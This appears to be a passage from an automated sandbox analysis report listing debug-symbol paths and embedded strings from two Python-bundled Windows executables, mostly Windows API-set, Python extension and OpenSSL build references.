Source: Binary string: C:\A\31\b\bin\amd64\_hashlib.pdb source: bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3397261324.00007FFDA57F5000.00000002.00000001.01000000.00000018.sdmp, registry_4131f52c.exe, 00000017.00000003.2400522958.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3397022833.00007FFDA46D5000.00000002.00000001.01000000.0000002D.sdmp
Source: Binary string: ~/.pdbrc source: bOamY.exe, 00000010.00000002.3391793141.000001E4F6B80000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391611067.0000018B973B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314582506.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407183726.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318104601.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419450800.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdb.Pdb source: bOamY.exe, 00000010.00000002.3391793141.000001E4F6B80000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391611067.0000018B973B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2313821127.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406546498.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317780907.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418440641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\unicodedata.pdb source: bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3394366786.00007FFD93465000.00000002.00000001.01000000.0000001C.sdmp, registry_4131f52c.exe, 00000017.00000003.2431633460.0000014CAE21C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3392444949.00007FFD83135000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317942434.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419322035.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314973975.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407655702.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2320923162.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420688942.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2311310619.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2403419464.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317125984.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417579847.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314838665.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407471496.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: C:\A\31\b\bin\amd64\_asyncio.pdb source: bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3395542401.00007FFDA5547000.00000002.00000001.01000000.0000001D.sdmp, registry_4131f52c.exe, 00000017.00000003.2398583148.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3395442580.00007FFDA3BF7000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdb source: bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3397585222.00007FFDA581D000.00000002.00000001.01000000.00000012.sdmp, registry_4131f52c.exe, 00000017.00000003.2400747889.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3395622073.00007FFDA3C2D000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2315984163.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2408655566.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2312703598.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405878142.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.23.dr
Source: Binary string: C:\A\31\b\bin\amd64\_socket.pdb source: bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3396905216.00007FFDA55E9000.00000002.00000001.01000000.00000013.sdmp, registry_4131f52c.exe, 00000017.00000003.2402485480.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3396266893.00007FFDA4339000.00000002.00000001.01000000.00000028.sdmp, _socket.pyd.15.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317780907.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418440641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2320923162.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420688942.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2313340825.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406237358.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdb.Pdbr source: bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2312581468.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405712741.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\python38.pdb source: bOamY.exe, 00000010.00000002.3393855734.00007FFD84024000.00000002.00000001.01000000.0000000C.sdmp, registry_4131f52c.exe, 00000018.00000002.3393911083.00007FFD83784000.00000002.00000001.01000000.00000021.sdmp, python38.dll.23.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2313586504.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406407641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb** source: pywintypes38.dll.23.dr, pywintypes38.dll.15.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316950781.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417424650.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdbMM source: bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3397585222.00007FFDA581D000.00000002.00000001.01000000.00000012.sdmp, registry_4131f52c.exe, 00000017.00000003.2400747889.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3395622073.00007FFDA3C2D000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: bOamY.exe, 0000000F.00000003.2316723898.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417301947.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_ctypes.pdb source: bOamY.exe, 00000010.00000002.3399384168.00007FFDAC102000.00000002.00000001.01000000.0000000F.sdmp, registry_4131f52c.exe, 00000018.00000002.3397344065.00007FFDA46F2000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\win32wnet.pdb source: bOamY.exe, 0000000F.00000003.2345919215.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2432144564.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314838665.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407471496.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1g 21 Apr 2020built on: Fri Jun 12 19:40:20 2020 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-1_1"not available source: bOamY.exe, 00000010.00000002.3393241408.00007FFD83C27000.00000002.00000001.01000000.00000017.sdmp, registry_4131f52c.exe, 00000018.00000002.3393321366.00007FFD83387000.00000002.00000001.01000000.0000002C.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_queue.pdb source: bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3396143411.00007FFDA55A3000.00000002.00000001.01000000.00000019.sdmp, registry_4131f52c.exe, 00000017.00000003.2402149033.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3396581823.00007FFDA4633000.00000002.00000001.01000000.0000002E.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: bOamY.exe, 0000000F.00000003.2314452068.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407019715.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: -c are executed after commands from .pdbrc files. source: bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316376608.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2409520861.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2320591915.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420550051.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: bOamY.exe, 0000000F.00000003.2315769153.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407806029.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2311807566.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405381148.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314297640.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406875328.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314452068.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407019715.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314730096.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407332641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: d:\agent\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: bOamY.exe, 0000000F.00000003.2308245690.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2397643504.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2316188640.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2408904329.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.23.dr
Source: Binary string: Initial commands are read from .pdbrc files in your home directory source: bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_ssl.pdb source: bOamY.exe, 00000010.00000002.3396382351.00007FFDA55BD000.00000002.00000001.01000000.00000015.sdmp, registry_4131f52c.exe, 00000018.00000002.3395195451.00007FFDA388D000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2311310619.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2403419464.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318617941.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420081483.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2321357657.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420845388.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcrypt_rust.pdb source: _bcrypt.pyd.23.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316544727.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2410381367.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314047620.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406701336.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: If a file ".pdbrc" exists in: source: bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316188640.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2408904329.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318104601.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419450800.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2320591915.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420550051.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318266888.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419793049.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.23.dr
Source: Binary string: d:\agent\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: bOamY.exe, 0000000F.00000003.2304551538.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3399640942.00007FFDAC140000.00000002.00000001.01000000.0000000D.sdmp, registry_4131f52c.exe, 00000017.00000003.2396862133.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3399041087.00007FFDA54C0000.00000002.00000001.01000000.00000022.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314582506.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407183726.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2320161253.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420387407.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: placed in the .pdbrc file): source: bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_overlapped.pdb source: bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3395372219.00007FFDA5535000.00000002.00000001.01000000.0000001E.sdmp, registry_4131f52c.exe, 00000017.00000003.2401213950.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3395836204.00007FFDA3EB5000.00000002.00000001.01000000.00000033.sdmp
Source: Binary string: If a file ".pdbrc" exists in your home directory or in the current source: bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317283892.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417805410.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2316544727.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2410381367.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2313821127.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406546498.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318488555.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419930594.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2313586504.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406407641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314973975.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407655702.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2312471386.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405565066.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2312703598.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405878142.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2312581468.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405712741.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316723898.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417301947.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317618285.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418243892.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318617941.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420081483.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317283892.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417805410.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2311629969.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2403688770.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: bOamY.exe, 00000010.00000002.3394841160.00007FFDA35C4000.00000002.00000001.01000000.00000016.sdmp, registry_4131f52c.exe, 00000018.00000002.3394805949.00007FFD93324000.00000002.00000001.01000000.0000002B.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2312471386.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405565066.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\pyexpat.pdb source: pyexpat.pyd.23.dr
Source: Binary string: ucrtbase.pdbUGP source: bOamY.exe, 00000010.00000002.3395178924.00007FFDA3974000.00000002.00000001.01000000.0000000B.sdmp, registry_4131f52c.exe, 00000018.00000002.3394559411.00007FFD83984000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317618285.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418243892.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2320161253.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420387407.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb?? source: bOamY.exe, 00000010.00000002.3394841160.00007FFDA35C4000.00000002.00000001.01000000.00000016.sdmp, registry_4131f52c.exe, 00000018.00000002.3394805949.00007FFD93324000.00000002.00000001.01000000.0000002B.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2315984163.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2408655566.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2312817260.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406050971.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: bOamY.exe, 00000010.00000002.3393241408.00007FFD83C27000.00000002.00000001.01000000.00000017.sdmp, registry_4131f52c.exe, 00000018.00000002.3393321366.00007FFD83387000.00000002.00000001.01000000.0000002C.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2311629969.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2403688770.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317465589.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418017150.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcrypt_rust.pdbD source: _bcrypt.pyd.23.dr
